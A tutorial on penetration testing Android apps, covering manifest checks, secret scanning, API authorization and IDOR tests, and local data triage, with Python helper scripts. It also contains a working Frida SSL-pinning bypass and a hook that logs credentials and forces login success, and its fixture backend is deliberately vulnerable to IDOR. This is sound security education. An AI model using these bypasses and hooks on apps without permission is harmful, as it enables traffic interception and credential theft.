Mobile apps are everywhere, from social media and enterprise tools to payment wallets, yet many still ship with avoidable weaknesses. This handbook is a step-by-step tutorial on pentesting mobile (primarily Android) apps in 2025, with code snippets, tool instructions, and practical advice.
Tools Setup
Below is a quick Android setup (Debian/Ubuntu shown; on macOS install the android-platform-tools package via Homebrew instead of apt):
# Install ADB (Android Debug Bridge)
sudo apt install android-tools-adb
# Install MobSF (its setup script creates a virtual environment); start it afterwards with ./run.sh
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
./setup.sh
To decompile an Android APK:
# Use JADX
jadx openexploit.apk -d outputfolder
# Use APKTool
apktool d openexploit.apk -o decompiled
To capture HTTPS traffic, install Burp Suite, point the device's Wi-Fi proxy at Burp's listener, and install Burp's CA certificate on the device. Since Android 7, apps do not trust user-installed CAs unless their network security config opts in, so on a rooted device the certificate has to go into the system trust store, or trust has to be patched at runtime as shown under Dynamic Analysis.
Information Gathering
Simple reconnaissance on an APK file:
# Show APK permissions
aapt dump permissions openexploit.apk
# Read the manifest. The copy inside the APK is binary XML, so unzip -p prints garbage;
# let aapt decode it, or read decompiled/AndroidManifest.xml from the apktool step above.
aapt dump xmltree openexploit.apk AndroidManifest.xml
Check for:
- android:debuggable="true" on <application> (allows attaching a debugger and gives run-as access to the app's private data).
- Exported activities, services, receivers, and providers: android:exported="true", or an intent-filter with no explicit android:exported on targets below Android 12, with no android:permission guarding the component.
- android:allowBackup="true" and android:usesCleartextTraffic="true".
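The checks above are easy to automate once the manifest is decoded. The script below is an added example written for this guide (it is not part of aapt, apktool or MobSF); it reads a decoded AndroidManifest.xml such as the one apktool writes, reports the debuggable/allowBackup/cleartext flags, and lists every component that is reachable from other apps without a permission guarding it. SAMPLE_MANIFEST and the component names in it are constructed for the demonstration.

```python
"""Flag risky settings in a decoded AndroidManifest.xml (e.g. apktool output).

Added example for this guide, not part of aapt or apktool. The SAMPLE_MANIFEST
below is constructed; pass a real file path on the command line instead.
"""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")
APP_FLAGS = ("debuggable", "allowBackup", "usesCleartextTraffic")  # explicit opt-ins only


def attr(el, name):
    """Read an android:-namespaced attribute, or None when absent."""
    return el.get("{%s}%s" % (ANDROID_NS, name))


def is_launcher(component):
    """The launcher activity is exported by design; do not report it."""
    return any(
        attr(cat, "name") == "android.intent.category.LAUNCHER"
        for f in component.findall("intent-filter")
        for cat in f.findall("category")
    )


def is_exported(component):
    """Effective exported state of a component.

    An explicit android:exported wins. Without it, activities, services and
    receivers that declare an intent-filter are implicitly exported on targets
    below Android 12 (Android 12+ refuses to install such manifests). Providers
    have no intent-filter rule, so without an explicit value this script treats
    them as not exported.
    """
    explicit = attr(component, "exported")
    if explicit is not None:
        return explicit == "true"
    if component.tag == "provider":
        return False
    return component.find("intent-filter") is not None


def is_protected(component):
    """True when some permission guards the component."""
    return any(attr(component, p) is not None
               for p in ("permission", "readPermission", "writePermission"))


def analyze_manifest(xml_text):
    """Return (issue, tag, android:name) tuples for everything worth a look."""
    app = ET.fromstring(xml_text).find("application")
    findings = [(flag, "application", attr(app, "name"))
                for flag in APP_FLAGS if attr(app, flag) == "true"]
    for tag in COMPONENT_TAGS:
        for comp in app.findall(tag):
            if is_exported(comp) and not is_protected(comp) and not is_launcher(comp):
                findings.append(("exported-unprotected", tag, attr(comp, "name")))
    return findings


# Constructed manifest: one debuggable app, a launcher activity (fine), a deep-link
# activity implicitly exported via its intent-filter (finding), a permission-guarded
# service (fine), an open receiver (finding) and a read-permission-guarded provider.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.target.openexploit">
  <application android:debuggable="true" android:allowBackup="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="openexploit"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.target.openexploit.SYNC"/>
    <receiver android:name=".BootReceiver" android:exported="true"/>
    <provider android:name=".DataProvider" android:exported="true"
              android:authorities="com.target.openexploit.data"
              android:readPermission="com.target.openexploit.READ"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    for issue, tag, name in analyze_manifest(text):
        print("[%s] <%s android:name=%s>" % (issue, tag, name))
```

Run it against decompiled/AndroidManifest.xml; every "exported-unprotected" line is a candidate for intent-based attacks (start the activity with adb shell am start, send the receiver a broadcast) and belongs in the report.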
Static Analysis
Decompile and read the source code for hardcoded secrets:
# Using JADX
jadx-gui openexploit.apk
Look for:
String apiKey = "openexploit_api_key";
Also scan res/values/strings.xml, assets/, and the .so native libraries (run strings over the binaries, or grep their raw bytes) for secrets.
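Grepping a jadx tree by hand is slow, so the scanner below is an added example written for this guide (it is not jadx, apktool or MobSF output). It walks a decompiled tree, applies pattern rules for a few well-known key formats plus a generic key/secret/password/token assignment rule, and uses Shannon entropy to drop placeholder values such as "xxxxxxxx" that the generic rule would otherwise report. The SAMPLES dictionary stands in for real files and is constructed; the AKIA and AIza values in it are synthetic.

```python
"""Scan decompiled sources and resources for hardcoded secrets.

Added example for this guide, not part of jadx, apktool or MobSF.
SAMPLES below are constructed inputs; pass a directory to scan a real tree.
"""
import math
import os
import re

RULES = [
    ("aws-access-key", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("google-api-key", re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b")),
    ("jwt", re.compile(r"\beyJ[A-Za-z0-9_\-]{8,}\.[A-Za-z0-9_\-]{8,}\.[A-Za-z0-9_\-]*")),
    ("private-key", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
    # Generic assignments: Java/Kotlin (apiKey = "..."), strings.xml
    # (<string name="api_key">...</string>) and shared_prefs entries.
    ("generic-secret", re.compile(
        r"(?i)(?:api[_-]?key|secret|passw(?:or)?d|token)[\"']?\s*(?:[:=]|>)\s*[\"']?"
        r"([A-Za-z0-9+/=_\-]{12,})")),
]
MIN_ENTROPY = 3.0  # bits per character; "xxxxxxxxxxxx" scores 0, real keys usually > 3.5


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for empty or single-symbol strings)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def scan_text(text, path="<memory>"):
    """Return (path, line_no, rule, matched_value) for every hit in text."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            for m in rx.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                # The generic rule fires on any assignment to a key-like name, so
                # suppress low-entropy values (placeholders, "0000000000", ...).
                if rule == "generic-secret" and shannon_entropy(value) < MIN_ENTROPY:
                    continue
                hits.append((path, line_no, rule, value))
    return hits


def scan_tree(root):
    """Walk a decompiled tree. Binaries (.so, .dex) are decoded as latin-1 so the
    same rules behave like `strings` over them."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                hits.extend(scan_text(fh.read().decode("latin-1"), full))
    return hits


# Constructed stand-ins for files in a jadx/apktool output tree.
SAMPLES = {
    "sources/com/target/openexploit/MainActivity.java": (
        "public class MainActivity {\n"
        '    String apiKey = "openexploit_api_key";\n'
        '    static final String AWS = "AKIAIOSFODNN7EXAMPLE";\n'
        '    String password = "xxxxxxxxxxxxxxxx";  // placeholder, low entropy\n'
        "}\n"
    ),
    "res/values/strings.xml": (
        "<resources>\n"
        '    <string name="app_name">OpenExploit</string>\n'
        '    <string name="google_maps_key">AIzaSyA1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q</string>\n'
        "</resources>\n"
    ),
}


def scan_samples():
    hits = []
    for path, text in SAMPLES.items():
        hits.extend(scan_text(text, path))
    return hits


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for path, line_no, rule, value in results:
        print("%s:%d: %s: %s" % (path, line_no, rule, value))
```

Treat every hit as a lead, not a finding: confirm the value is live (for example by calling the API with it, within scope) before reporting it, and note that the entropy filter also hides genuinely weak secrets such as "password1234", which deserve their own finding.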
Dynamic Analysis
Intercept API calls:
Use Burp Suite and manipulate app traffic. Set your proxy and monitor requests. Look for JWTs, session cookies, API parameters.
Bypass SSL pinning using Frida. The hook below only covers apps that pin by handing a custom X509TrustManager to SSLContext.init; pins enforced through OkHttp's CertificatePinner or the Network Security Config need separate hooks or a multi-library bypass script.
# Android SSL pinning bypass (Frida script); -U = USB device, -n = attach to the running process.
# Spawning with -f com.target.openexploit instead puts the hook in place before the first TLS handshake.
frida -U -n com.target.openexploit -l frida-ssl-bypass.js
Sample code snippet of frida-ssl-bypass.js:
Java.perform(function () {
    var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
    var SSLContext = Java.use('javax.net.ssl.SSLContext');

    // A TrustManager that accepts every certificate chain without checking it.
    var TrustManager = Java.registerClass({
        name: 'org.wooyun.TrustManager',
        implements: [X509TrustManager],
        methods: {
            checkClientTrusted: function (chain, authType) {},
            checkServerTrusted: function (chain, authType) {},
            getAcceptedIssuers: function () { return []; }
        }
    });
    var TrustManagers = [TrustManager.$new()];

    // Replace whatever TrustManager array the app passes to SSLContext.init
    // with ours, so the app's pinned trust store is never consulted.
    var SSLContextInit = SSLContext.init;
    SSLContext.init.implementation = function (keyManager, trustManager, secureRandom) {
        SSLContextInit.call(this, keyManager, TrustManagers, secureRandom);
    };
});
API Testing
Use Burp Suite (Repeater and Intruder) to fuzz and test API security.
Test authentication and authorization on a captured request such as:
POST /api/user/profile HTTP/1.1
Host: www.openexploit.in
Authorization: Bearer [XXXX-XXXX-XXXX-XXXX]
- Replay the request with an expired authentication token.
- Remove the token entirely and check whether the endpoint still responds.
- Insecure Direct Object Reference (IDOR): change object IDs in the path or body and check whether another user's data comes back.
Use Curl for API testing:
curl -X GET https://api.openexploit.in/user/123 \
-H "Authorization: Bearer authtoken-xxx-xx-xxx-xxx"
See if you are able to:
- View other users' data
- Change roles (your own or another user's)
- Call admin-only endpoints with a regular user's token
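The three checks above (expired or missing token, IDOR, and reaching admin endpoints as a regular user) are one authorization matrix: a set of requests, each with a token and the set of status codes that would be acceptable, where anything else is a finding. The script below is an added example written for this guide, not tooling from the page or from Burp. The backend function is a constructed stand-in for a real server, deliberately vulnerable to IDOR so the checker has something to find offline; the tokens are unsigned alg=none JWTs built only as fixtures, and the JWT helper decodes payloads without verifying them.

```python
"""Authorization matrix test for a mobile backend.

Added example for this guide, not the page's own tooling. `backend` is a
constructed, deliberately vulnerable stand-in for a real API; against a live
target replace it with a function that performs the HTTP request (through
Burp if you like) and returns (status_code, body). The JWT helpers only
decode; they never verify signatures.
"""
import base64
import json

NOW = 1_700_000_000  # frozen clock so the constructed tokens stay deterministic


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token):
    """Decode a JWT payload WITHOUT verifying it (to read exp/sub/role)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT")
    return json.loads(_b64url_decode(parts[1]))


def make_jwt(claims):
    """Build an unsigned (alg=none) token purely as a test fixture."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return enc({"alg": "none", "typ": "JWT"}) + "." + enc(claims) + "."


# --- constructed target ---------------------------------------------------
USERS = {
    1: {"id": 1, "name": "alice", "role": "user"},
    2: {"id": 2, "name": "bob", "role": "user"},
}


def backend(method, path, token):
    """Fake server: checks token presence and expiry, and checks the role on the
    admin endpoint, but /user/<id> never checks that <id> belongs to the caller."""
    if token is None:
        return 401, None
    claims = jwt_claims(token)
    if claims["exp"] < NOW:
        return 401, None
    if method == "GET" and path.startswith("/user/"):
        uid = int(path.rsplit("/", 1)[1])
        return (200, USERS[uid]) if uid in USERS else (404, None)  # BUG: no owner check (IDOR)
    if method == "GET" and path == "/admin/users":
        return (200, list(USERS.values())) if claims.get("role") == "admin" else (403, None)
    return 404, None


# --- the test matrix ------------------------------------------------------
def build_cases():
    """(label, method, path, token, acceptable statuses). A status outside the
    acceptable set is an authorization finding."""
    alice = make_jwt({"sub": 1, "role": "user", "exp": NOW + 3600})
    bob_expired = make_jwt({"sub": 2, "role": "user", "exp": NOW - 1})
    return [
        ("own profile", "GET", "/user/1", alice, {200}),
        ("IDOR: another user's profile", "GET", "/user/2", alice, {403, 404}),
        ("missing token", "GET", "/user/1", None, {401}),
        ("expired token", "GET", "/user/2", bob_expired, {401}),
        ("vertical: admin endpoint as user", "GET", "/admin/users", alice, {403}),
    ]


def authz_matrix(send, cases):
    """Run every case through `send`; return those whose status was not acceptable."""
    violations = []
    for label, method, path, token, allowed in cases:
        status, _body = send(method, path, token)
        if status not in allowed:
            violations.append((label, path, status))
    return violations


if __name__ == "__main__":
    for label, path, status in authz_matrix(backend, build_cases()):
        print("FINDING %s: %s returned %d" % (label, path, status))
```

Against a real target, capture the app's own requests in Burp, issue a second account so you hold two valid tokens, and feed both into the matrix: the IDOR and vertical-escalation rows are the ones that need a second identity, and an endpoint that answers 200 to another user's token is the finding.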
Local Data Storage Analysis
Pull data from an Android emulator/device:
# List app packages
adb shell pm list packages
# Inspect the openexploit app's private data. adb root only works on emulators and
# userdebug builds; on a rooted production device open adb shell and use su instead.
# If the build is debuggable, run-as com.target.openexploit reaches the same directory without root.
adb root
adb shell
cd /data/data/com.target.openexploit/
Check these:
- shared_prefs/ – does any .xml file contain credentials or tokens?
- databases/ – dump the SQLite databases with sqlite3:
sqlite3 openexploit.db
sqlite> .tables
sqlite> SELECT * FROM users;
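Once the shared_prefs/ and databases/ directories are pulled to your machine, the triage below is an added example written for this guide (not part of Android or the sqlite3 CLI): it parses shared_prefs XML files and walks every table of every SQLite database, reporting preference keys and columns whose names suggest credentials, sessions or PINs together with a few stored values, so plaintext storage is obvious at a glance. SAMPLE_PREFS and build_sample_db() are constructed fixtures standing in for pulled files.

```python
"""Triage app data pulled from /data/data/<package>/: shared_prefs XML and SQLite.

Added example for this guide, not part of Android or the sqlite3 CLI.
SAMPLE_PREFS and build_sample_db() are constructed fixtures.
"""
import os
import re
import sqlite3
import tempfile
import xml.etree.ElementTree as ET

SENSITIVE_WORDS = {"password", "passwd", "pwd", "secret", "token", "session",
                   "apikey", "auth", "pin", "cvv", "ssn", "credential", "credentials"}


def looks_sensitive(name):
    """Split camelCase/snake_case names into words and match against the list,
    so 'sessionToken' and 'user_pin' hit while 'shipping_address' does not."""
    words = re.sub(r"(?<=[a-z0-9])(?=[A-Z])", "_", name).lower().split("_")
    return any(w in SENSITIVE_WORDS for w in words) or {"api", "key"} <= set(words)


def triage_shared_prefs(xml_text, filename="prefs.xml"):
    """Return (filename, key, value) for sensitive-looking entries in a shared_prefs
    file. Entries are <string name=..>v</string> or typed elements such as
    <boolean name=.. value=".."/>, so the value is either text or an attribute."""
    hits = []
    for el in ET.fromstring(xml_text):
        key = el.get("name", "")
        if looks_sensitive(key):
            value = el.text if el.text is not None else el.get("value")
            hits.append((filename, key, value))
    return hits


def triage_sqlite(db_path, sample_rows=3):
    """Return (table, column, sample values) for sensitive-looking columns.
    Identifiers come from sqlite_master/PRAGMA output, so double-quoting is enough."""
    hits = []
    con = sqlite3.connect(db_path)
    try:
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
        for table in tables:
            columns = [r[1] for r in con.execute('PRAGMA table_info("%s")' % table)]
            for col in columns:
                if looks_sensitive(col):
                    rows = con.execute('SELECT "%s" FROM "%s" LIMIT ?' % (col, table),
                                       (sample_rows,)).fetchall()
                    hits.append((table, col, [r[0] for r in rows]))
    finally:
        con.close()
    return hits


# Constructed shared_prefs file (real ones start with an XML declaration).
SAMPLE_PREFS = """<map>
    <string name="username">alice</string>
    <string name="auth_token">eyJhbGciOiJIUzI1NiJ9.e30.c2ln</string>
    <boolean name="biometric_enabled" value="true" />
    <string name="user_pin">1234</string>
</map>
"""


def build_sample_db(path):
    """Create a constructed app database that stores credentials in plaintext."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT,
                            shipping_address TEXT);
        INSERT INTO users VALUES (1, 'alice@example.com', 'Summer2024!', '1 Main St');
        INSERT INTO users VALUES (2, 'bob@example.com', 'hunter2', '2 Side Rd');
        CREATE TABLE sessions (id INTEGER PRIMARY KEY, user_id INTEGER, sessionToken TEXT);
        INSERT INTO sessions VALUES (1, 1, 'sess-9f8e7d6c');
    """)
    con.commit()
    con.close()


def run_demo():
    """Triage the constructed fixtures; returns (prefs_hits, db_hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        db = os.path.join(tmp, "openexploit.db")
        build_sample_db(db)
        return (triage_shared_prefs(SAMPLE_PREFS, "shared_prefs/openexploit.xml"),
                triage_sqlite(db))


if __name__ == "__main__":
    prefs, dbs = run_demo()
    for f, k, v in prefs:
        print("%s: %s = %r" % (f, k, v))
    for t, c, vals in dbs:
        print("%s.%s: %s" % (t, c, vals))
```

Column and key names are only a heuristic; also eyeball the remaining tables for values that look like tokens or card numbers under innocent names, and check whether the app's Network Security Config or EncryptedSharedPreferences usage means what you found is ciphertext rather than plaintext before writing it up.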
Reverse Engineering and Code Injection
Instrument the app at runtime with Frida and Objection.
# Install Objection
pip install objection
# Start an exploration session against the target package
objection -g com.target.openexploit explore
# Inside the shell: patches the common root-detection checks; custom checks still need hand-written Frida hooks
android root disable
Hooking methods using Frida:
Java.perform(function () {
    // Hypothetical class and method; take the real names from the jadx output.
    var Login = Java.use("com.app.login.LoginActivity");
    // If checkCredentials is overloaded, pick the signature first, e.g.
    // Login.checkCredentials.overload('java.lang.String', 'java.lang.String').implementation = ...
    Login.checkCredentials.implementation = function (user, pass) {
        console.log("User: " + user + ", Pass: " + pass);
        return true; // force login success (client-side only; the server is unaffected)
    };
});
Reporting
Write an organized report aligned with OWASP MASVS, citing the matching MASTG test case for each finding. Here is a sample report format:
Title: Hardcoded API Key in Source Code
Risk: High
Affected Component: openexploit.apk > MainActivity.java
Proof: String apiKey = "XXXX-XXXX-XXXX-XXXX";
Impact: Exposed API key can permit unauthorized API calls.
Recommendation: Place API keys in a secure backend. Never store secrets in app code.
You can use tools such as Dradis or Faraday to document findings.
Common Mobile Vulnerabilities
- Insecure local storage (plaintext credentials in shared_prefs or SQLite)
- Missing or bypassable SSL pinning
- Weak API authentication and authorization (IDOR, privilege escalation)
- Unprotected exported components
- Hardcoded secrets
- Debuggable release builds
- Lack of runtime protections (no root, hooking, or tamper detection)
Resource Reference
- OWASP MASVS and MASTG (formerly MSTG)
- Frida
- OWASP MASTG on GitHub
- Android Pentesting Cheat Sheet
- TryHackMe
Conclusion
Mobile app pentesting in 2025 is one of the most in-demand skills for ethical hackers and security engineers. As digital identity moves onto mobile devices, AI-powered apps, and increasingly complex APIs, finding weaknesses before attackers do matters more than ever.
Start small. Practice on deliberately vulnerable test apps. And always obtain written legal authorization before testing live apps.